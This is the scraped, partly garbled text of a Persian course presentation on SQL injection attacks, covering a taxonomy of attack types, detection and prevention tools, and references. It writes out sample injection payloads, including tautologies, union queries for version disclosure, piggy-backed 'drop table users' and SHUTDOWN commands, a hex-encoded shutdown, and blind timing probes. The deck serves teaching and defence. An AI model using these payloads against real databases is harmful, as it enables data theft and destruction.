حمله تزریق SQL. پروژه درس امنیت پایگاه داده استاد : دکتر جلیلی ارائه دهندگان: ساجده حرّاز نرگس یوسف نژاد. فهرست مطالب. تعریف Sql Injection Attack. 1. معماری WEB APPLICATION. 2. انواع SQLIA. 3. روش های پیشگیری وتشخیص SQLIA. 4. - PowerPoint PPT Presentation
SQL :
:
Sql Injection Attack 1 WEB APPLICATION2 SQLIA3 SQLIA42
SQLIA3
SQLIA
SQLIA3
OWASP
4
WEB APPLICATION
5
SQLIA
Tautologies Illegal/Logically Incorrect QueriesUnion QueryPiggy-
Backed Queries Stored Procedures InferenceAlternate Encodings6
Tautologies attack
: SELECT FROM user WHEREid = 1 or 1 = 1 AND password = 1111
7
Illegal/Logically Incorrect Queries attack
: pin : convert (int,(select top 1 name from sysobjects
wheretype=u)) Query CGI layer :SELECT accounts FROM users WHERE
login= AND pass= AND pin= convert (int,(select top 1 name from
sysobjects where xtype=u)) sql: "Microsoft OLE DB Provider for SQL
Server (0x80040E07) Error converting nvarchar value CreditCards to
a column of data type int. : 1- sql server . 2- credit card
8
Union Query attack: $sqlquery = "SELECT * From news WHERE id
=$id";$process=odbc_exec($sqlconnect, $sqlquery);echo
odbc_result($process,2);
1 and 1=2 union select 1,@@version id :SELECT * From news WHERE
id = 1 and 1=0union select 1,@@version,3 -- .9
Piggy- Backed Queries attack: ;drop table users - - SELECT
accounts FROM users WHERE login=doe ANDpass=; drop table users --
AND pin=123
: users
10
Stored Procedures attack
: : CREATE PROCEDURE DBO.isAuthenticated @userName varchar2,
@pass varchar2, @pin int ASEXEC("SELECT accounts FROM usersWHERE
login=" +@userName+ " and pass=" +@password+ " and pin=" +@pin);GO
; SHUTDOWN; - - pass:SELECT accounts FROM users WHERElogin=doe AND
pass= ; SHUTDOWN; -- AND pin=
: !11
Alternate Encodings attack: legalUser; exec(0x73687574646f776e)
- - loginSELECT accounts FROM users WHERE
login=legalUser;exec(char(0x73687574646f776e)) -- AND pass= shut
down .
12
Inference attack: -1 Blind Injection : true false1-SELECT
accounts FROM users WHERE login=legalUserand 1=0 -- AND pass= AND
pin=0
2-SELECT accounts FROM users WHERE login=legalUser and 1=1 --
AND pass= AND pin=0 : login . : login .13
Inference attack (continue)Timing Attack-2 sql SELECT accounts
FROM users WHERE login=legalUserand ASCII(SUBSTRING((select top 1
name from sysobjects),1,1)) > X WAITFOR 5 -- AND pass= AND
pin=0
14
(WAVES) (JDBC-Checker) (Valeur ) proxy (SQLrand)
15
() (WAVES) web crawler
(JDBC-Checker) 16
() (AMNESIA ) .
17
() (SQL DOM Safe Query Objects) API : 18
() (Valeur) . false positive false negative 19
() proxy (Security Gateway) (SPDL) .
20
() (SQLrand) SQL proxy .:
21
22
23CODE SECURELY
MONITOR FOR ATTACKS BLOCK ATTACKS
CODE SECURELY Perl Java VB.NET24
Java
25
MONITOR FOR ATTACKS (NIDS) pattern-matching snort regular
expression IDS (HIDS) (AppIDS)
26
BLOCK ATTACKSApplication firewallsWeb-application firewalls IDS
SSL
27
BLOCK ATTACKS Cisco Application Velocity System (AVS) (built-in)
.28ModSecurity
.
Bravenboer, M., Dolstra, E., Visser, E., "Preventing injection
attacks with syntax embeddings", Science of Computer Programming,
vol. 75, pp. 473-495, 2010.Clarke, J., "SQL Injection Attacks and
Defense", Elsevier, Syngress Publishing, Inc., 2009.Halfond, W. G.
J., Viegas, J., Orso, A., "A Classification of SQL Injection
Attacks and Countermeasures", Computing, 2006.Jeong, I. Lee, S.,
Yeo, S., Moond, J., "A novel method for SQL injection attack
detection based on removing SQL query attribute values",
Mathematical and Computer Modelling, vol. 55, pp. 5868,
2012.Mackay, C. A., "SQL Injection Attacks and Some Tips on How to
Prevent Them", Technical report, The Code Project, 2005,
http://www.codeproject.com/cs/database/SqlInjectionAttacks.asp.Moyle,
S., "The blackhats toolbox: SQL injections", Network Security, pp.
12-14, 2007.Muthuprasanna, M., Kothari, W. Ke, S., "Eliminating SQL
Injection Attacks - A Transparent Defense Mechanism",
Analysis.Nystrom, M. G., "SQL Injection Detection", O'Reilly Media,
Inc, 2007.Ping-Chen, X., "SQL injection attack and guard technical
research", Procedia Engineering, vol. 15, pp. 4131- 4135,
2011.29
Question? or 1=1 - - Select @@version ) or 1 = 1 - -
ASCII(SUBSTRING((select top 1 name from sysobjects),1,1)) > X
WAITFOR 5 --
exec(0x73687574646f776e) - -
